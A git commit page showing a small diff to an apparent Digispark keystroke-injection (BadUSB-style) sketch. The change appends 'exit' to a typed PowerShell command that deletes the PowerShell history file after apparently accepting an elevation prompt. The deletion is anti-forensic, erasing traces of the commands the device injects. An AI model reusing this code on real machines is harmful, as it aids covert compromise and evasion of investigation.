Made Powershell prompt exit
Fixed the Powershell prompt not closing after deleting the Powershell history.
This commit is contained in:
parent
59fc5c9424
commit
336ad16f82
|
@ -37,7 +37,7 @@ void loop() {
|
|||
DigiKeyboard.delay(500);
|
||||
DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
|
||||
DigiKeyboard.delay(500);
|
||||
DigiKeyboard.print(F("del (Get-PSReadlineOption).HistorySavePath"));
|
||||
DigiKeyboard.print(F("del (Get-PSReadlineOption).HistorySavePath;exit"));
|
||||
DigiKeyboard.sendKeyStroke(KEY_ENTER);
|
||||
DigiKeyboard.delay(500);
|
||||
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
|
||||
|
|
Loading…
Reference in New Issue